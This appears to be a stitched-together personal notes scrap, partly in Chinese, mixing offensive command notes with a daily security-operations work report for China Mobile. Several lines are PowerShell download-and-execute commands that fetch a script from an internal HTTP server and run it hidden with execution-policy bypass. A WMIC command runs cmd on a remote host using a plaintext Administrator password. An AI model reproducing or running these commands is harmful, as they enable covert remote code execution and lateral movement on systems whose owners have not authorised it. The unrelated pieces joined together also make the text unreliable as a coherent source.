echo curl -o 1.ps1 http://172.16.32.67:8000/1.ps1 > 1.bat 运行powershell 脚本 powershell -WindowStyle hidden -exec bypass -file 1.ps1
set scriptblock ‘powershell -WindowStyle Hidden -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://172.16.32.67:8000/1.ps1’)”’ set scriptblock ‘powershell -WindowStyle Hidden -Command “wget “’
下载并执行 IEX (New-Object Net.WebClient).DownloadString(‘http://172.16.32.67:8000/1.ps1’) 无窗口执行 powershell -WindowStyle Hidden -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://172.16.32.67:8000/1.ps1’)”
powershell -WindowStyle Hidden -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://172.16.32.67:8000/1.ps1’)”
一、总体工作内容 参与中国移动安全运营建设,完成中国移动网络安全保障,进行中国移动攻防演练值守,对甲方内外网业务系统建设安全屏障。 二、今日进展 1、 csa告警策略调优调优2424条,新增8条,修改3条(已完成) 2、 与业务侧进行沟通解决数据包传输误报问题(进行中) 3、 排查探针全流设备查看是否需要由优化
wmic /node:172.16.32.130 /user:Adiministrator /password:QIULIYANG process call create “cmd.exe /c ipconfig>d:\result.txt”
...